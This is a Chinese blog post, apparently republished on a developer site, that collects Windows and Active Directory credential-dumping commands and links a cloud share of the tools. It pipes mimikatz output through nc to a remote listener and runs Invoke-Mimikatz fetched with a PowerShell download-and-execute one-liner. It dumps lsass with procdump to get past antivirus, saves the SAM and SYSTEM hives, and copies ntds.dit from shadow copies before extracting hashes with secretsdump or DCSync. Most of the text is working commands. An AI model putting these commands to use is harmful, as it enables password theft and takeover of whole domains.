内容简介:结合网上一些公开的资料进行简单总结,本文所用工具均已整理到云盘。链接:提取码:9w0n
结合网上一些公开的资料进行简单总结,本文所用 工具 均已整理到云盘。
链接: https://pan.baidu.com/s/10nPmRZ7SMCz6TrrAsXew_w
提取码:9w0n
WINDOWS
windows下的密码由SAM数据库储存,位置在 C:\windows\system32\config\sam
mimikatz
privilege::debug token::elevate lsadump::sam
非交互
直接把结果发到vps接受
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc -vv 192.168.0.1 1234 在目标机器上执行 nc -lvp 1234 本地[实际中通常都是在自己的vps上]机器执行
导入指定文件
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit >> shash.txt
杀软
过杀软,先用procdump64.exe(微软的小工具)dump出数据然后下载到本地用mimikatz读取,本地读取要和目标系统完全一致。
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full
powershell调用mimikatz(不过感觉powershell也不太行了现在)
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | nc -vv 192.168.3.28 1234
nc -lvp 1234 本地[实际中通常都是在自己的vps上]机器执行
mimikatz不只能抓密码还可以进行域内hash票据的一些操作。
pwdump7
离线抓取目标主机密码
msf内置
hashdump 与 mimikatz
离线读取
用meterpreter下载 sys.hiv/sam.hiv/security.hiv 之后用impacket模块读取
reg save HKLM\SYSTEM sys.hiv reg save HKLM\SAM sam.hiv reg save HKLM\security security.hiv
之后用meterpreter自带的download下载(reg save之后使得下载文件更小)
python /tmp/impacket/examples/secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCA
导出SAM数据库文件
保存注册表
reg save HKLM\SYSTEM SystemBkup.hiv reg save HKLM\SAM SamBkup.hiv
复制文件
C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SAM
直接复制报错,需要借用ps脚本
Invoke-NinjaCopy -Path <需要复制的文件> -LocalDestination <复制文件保存位置>
域内dump所有用户hash
mimikatz
lsadump::dcsync /domain:pentestlab.local /all /csv
获取NTDS
拿到域管权限可以提取域内所有用户的密码hash,hash存在DC的NTDS.DIT中的数据库文件中
Volume Shadow Copy获取ntds.dit
Volume Shadow Copy Service:
- 用于数据备份
- 支持win server 2003及以上
- 系统默认在特定条件下自动创建数据备份,如补丁安装后。在Win7系统大概每隔一周自动创建备份,该时间无法确定
- 禁用VSS会影响系统正常使用,如 System Restore和 Windows Server Backup
ntdsutil
查询当前快照列表(找到已有的直接从快照里把ntds.dit复制出来就好了)
ntdsutil snapshot "List All" quit quit ntdsutil snapshot "List Mounted" quit quit
创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
拿到guid用于挂载快照
挂载快照
ntdsutil snapshot "mount {****************}" quit quit
复制ntds.dit
copy C:\$SNAP_201802270645_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
卸载快照
ntdsutil snapshot "unmount {*******************}" quit quit
删除快照
ntdsutil snapshot "delete {*********************}" quit quit
vssadmin
查询系统当前快照
vssadmin list shadows
创建快照
vssadmin create shadow /for=c:
复制快照
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\windows\NTDS\ntds.dit c:\ntds.dit
删除快照
vssadmin delete shadows /for=c: /quiet
Invoke-NinjaCopy
直接使用上文的强复制也行,也可以直接复制到一个远程服务器上
Invoke-NinjaCopy -Path <需要复制的文件> -LocalDestination <复制文件保存位置>
vshadow
这个不是系统自带的需要自己上传
https://docs.microsoft.com/zh-cn/windows/desktop/VSS/vshadow-tool-and-sample
直接命令行运行会有example
查询当前快照
vshadow.exe -q
创建快照
vshadow.exe -p -nw C:
复制快照
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\windows\NTDS\ntds.dit c:\ntds.dit
删除快照
vshadow -dx={809b77cc-cf9a-4101-b802-08e97d10e613}
不过我本地测试失败报错了
vssown.vbs
https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs
cscript vssown.vbs /start cscript vssown.vbs /create c cscript vssown.vbs /list copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\ntds\ntds.dit C:\ cscript vssown.vbs /delete
NTDS提取
impacket
python secretsdump.py -system /tmp/sys.hiv -ntds /root/Desktop/ntds.dit LOCAL
以上所述就是小编给大家介绍的《提取hash》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
你不知道的JavaScript(中卷)
[美] Kyle Simpson / 单业、姜南 / 人民邮电出版社 / 2016-8 / 79.00元
JavaScript这门语言简单易用,很容易上手,但其语言机制复杂微妙,即使是经验丰富的JavaScript开发人员,如果没有认真学习的话也无法真正理解。本套书直面当前JavaScript开发人员不求甚解的大趋势,深入理解语言内部的机制,全面介绍了JavaScript中常被人误解和忽视的重要知识点。本书是其中卷,主要介绍了类型、语法、异步和性能。一起来看看 《你不知道的JavaScript(中卷)》 这本书的介绍吧!
